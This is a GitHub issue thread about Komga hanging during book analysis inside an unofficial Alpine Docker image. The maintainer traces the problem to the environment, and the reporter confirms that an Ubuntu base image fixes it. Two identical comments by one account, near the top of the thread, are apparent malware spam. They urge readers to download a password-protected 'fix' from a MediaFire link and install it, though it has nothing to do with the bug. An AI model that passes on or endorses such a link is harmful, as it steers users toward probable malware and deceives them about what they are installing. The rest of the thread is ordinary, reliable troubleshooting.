### ISSUE TITLE
Files are not being analyzed on linux

### ISSUE THREAD

**Issue by SSoft7** [gotson/komga#1668]
### Steps to reproduce

Just add a folder with cbz files and add it to the library and then click analyze

### Expected behavior

It should analyze successfully and thumbnails should show up.

### Actual behavior

- The Analyze process never ends. The working indicator continue to animate at the top left.
- There is no error on the media analyze page `/media-management/analysis` or on the logs

### Logs

https://pastebin.com/717hhzyf

### Komga version

1.11.3

### Operating system

Alpine Linux Docker

### Installation method

other (please provide more details below)

### Other details

Docker/Alpine Linux Image

### Acknowledgements

- [X] I have searched the existing issues (open AND closed) and this is a new ticket, **NOT** a duplicate or related to another open issue.
- [X] I have written a short but informative title.
- [X] I have checked the [FAQ](https://komga.org/docs/faq).
- [X] I have updated the app to the latest version.
- [X] I will fill out all of the requested information in this form.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gotson** [comment]
> and then click analyze

you need to scan, not analyze

**Comment by SSoft7** [comment]
> > and then click analyze
> 
> you need to scan, not analyze

I tried already.
"Scan Library Files" and "Scan Library Files (Deep)". It was stuck, then I tried "Analyze" on a single item.

It is stuck like this 
![image](https://github.com/user-attachments/assets/ce895c2b-fec4-49e0-b370-6772aafcb712)

Media Analysis page is empty
![image](https://github.com/user-attachments/assets/39955407-1928-4c1c-823d-5a15adbf4838)

**Comment by gotson** [comment]
can you provide logs?

**Comment by SSoft7** [comment]
> can you provide logs?

Yes, Regular Logs will work? or I need to provide Debug/TRACE log?

**Comment by gotson** [comment]
regular logs, but more than what you provided so far which doesn't show anything weird. The logs in the initial post show that books are being analyzed.

**Comment by SSoft7** [comment]
Hello,

Here you can see the image of the dashboard - https://imgur.com/Kfhczf8
Here is the regular logs - https://bin.disroot.org/?68f0f2266d08e911#DTo1anVCJ8xQf8szrjxCRcwrVmsZ45mAmMgiBbguL1Kx

Let me know if debug log is required after this.

**Comment by gotson** [comment]
it says you run Komga with docker alpine linux, can you clarify how you are running it ? What's the underlying system hardware / OS ?

has it worked before ?

**Comment by SSoft7** [comment]
> it says you run Komga with docker alpine linux, can you clarify how you are running it ? What's the underlying system hardware / OS ?
> 
> has it worked before ?

- The underlying system hardware / OS: Just a regular linux Ubuntu server installation. Let me know if you are looking for any specific info?

- I'm testing this for the first  time so can't say about before.
- But a local non-docker installation of komga with `v.1.7.1-master` seems to be working fine with this same files.

**Comment by gotson** [comment]
why do you mention alpine in the original ticket ?

**Comment by SSoft7** [comment]
> why do you mention alpine in the original ticket ?

Because I'm running komga within a Alpine based container...not on the underlaying Ubuntu OS directly.

**Comment by gotson** [comment]
> Because I'm running komga within a Alpine based container...not on the underlaying Ubuntu OS directly.

Komga does not ship an official Alpine docker image, the official image is ubuntu based.

Given you manage to get Komga running without docker successfully, the issue most likely points at this unofficial docker image.

**Comment by SSoft7** [comment]
> > Because I'm running komga within a Alpine based container...not on the underlaying Ubuntu OS directly.
> 
> Komga does not ship an official Alpine docker image, the official image is ubuntu based.
> 
> Given you manage to get Komga running without docker successfully, the issue most likely points at this unofficial docker image.

You are correct. This works fine on the official docker image.

But ideally if something is wrong with the environment komga should complaint about it in the logs or atleast throw some random errors right?

As for my alpine image. I'm simply using this openjdk - https://pkgs.alpinelinux.org/package/v3.18/community/x86_64/openjdk17-jre-headless
and then using the Jar release file available on your releases page - https://github.com/gotson/komga/releases

I already checked this doc page but could not find any dependency listed for linux installation, so I assumed it would not require any - https://komga.org/docs/installation/jar

But, the official dockerfile available here - https://github.com/gotson/komga/blob/master/komga/docker/Dockerfile.tpl
indicates it needs lots of system dependencies.

Is there any page that list dependencies  to be installed? This would be very helpful.

**Comment by gotson** [comment]
> But ideally if something is wrong with the environment komga should complaint about it in the logs or atleast throw some random errors right?

a lot of things could go wrong at a lot of different levels, sometimes Komga doesn't even know about it



> You are correct. This works fine on the official docker image.

why not use the official image then ?

**Comment by SSoft7** [comment]
> > But ideally if something is wrong with the environment komga should complaint about it in the logs or atleast throw some random errors right?
> 
> a lot of things could go wrong at a lot of different levels, sometimes Komga doesn't even know about it
> 
> > You are correct. This works fine on the official docker image.
> 
> why not use the official image then ?

This looks like a glibc issue (alpine uses muslc) or maybe any other system level dependency issue.
I've switched to ubuntu as my base docker image and it is working fine now.

This issue can be closed now.
